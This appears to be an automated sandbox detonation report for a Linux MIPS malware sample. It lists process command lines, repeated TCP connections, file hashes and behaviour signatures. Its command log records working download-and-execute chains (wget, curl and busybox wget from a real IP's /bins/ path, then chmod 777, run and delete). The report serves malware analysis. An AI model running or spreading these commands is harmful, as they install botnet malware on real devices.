/bin/chmod
[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m
[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/rm
[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/wget
[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/chmod
[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q
[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/rm
[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/wget
[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/chmod
[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM
[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/rm
[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/wget
[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/chmod
[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5
[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/rm
[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/chmod
[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv
[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/rm
[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/wget
[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/chmod
[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj
[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/rm
[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/wget
[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/chmod
[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI
[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/rm
[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/chmod
[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh
[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/rm
[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/wget
[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/chmod
[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy
[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/rm
[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/wget
[wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/chmod
[chmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5
[./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/bin/rm
[rm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5]
/usr/bin/wget
[wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/chmod
[chmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk
[./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/bin/rm
[rm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk]
/usr/bin/wget
[wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/chmod
[chmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m
[./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/bin/rm
[rm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m]
/usr/bin/wget
[wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/chmod
[chmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q
[./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/bin/rm
[rm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q]
/usr/bin/wget
[wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/chmod
[chmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM
[./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/bin/rm
[rm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM]
/usr/bin/wget
[wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/chmod
[chmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv
[./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/bin/rm
[rm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv]
/usr/bin/wget
[wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/chmod
[chmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy
[./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/bin/rm
[rm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy]
/usr/bin/wget
[wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/chmod
[chmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj
[./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/bin/rm
[rm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj]
/usr/bin/wget
[wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/chmod
[chmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI
[./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/bin/rm
[rm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/chmod
[chmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh
[./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/bin/rm
[rm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh]
/usr/bin/wget
[wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/chmod
[chmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4
[./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/bin/rm
[rm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4]
/usr/bin/wget
[wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/chmod
[chmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
[./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/bin/rm
[rm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/chmod
[chmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT
[./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/bin/rm
[rm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT]
/usr/bin/wget
[wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/chmod
[chmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s
[./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
/bin/rm
[rm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-24 02:06
Reported
2024-11-24 02:09
Platform
debian9-mipsel-20240611-en
Max time kernel
109s
Max time network
111s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | N/A |
| N/A | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | N/A |
| N/A | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | N/A |
| N/A | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | N/A |
| N/A | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | N/A |
| N/A | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | N/A |
| N/A | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | N/A |
| N/A | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | N/A |
| N/A | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | N/A |
| N/A | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | N/A |
| N/A | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | N/A |
| N/A | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | N/A |
| N/A | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | N/A |
| N/A | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | N/A |
| N/A | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 | N/A |
| N/A | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk | N/A |
| N/A | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m | N/A |
| N/A | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q | N/A |
| N/A | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM | N/A |
| N/A | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv | N/A |
| N/A | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy | N/A |
| N/A | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj | N/A |
| N/A | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI | N/A |
| N/A | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh | N/A |
| N/A | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 | N/A |
| N/A | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ | N/A |
| N/A | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT | N/A |
| N/A | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
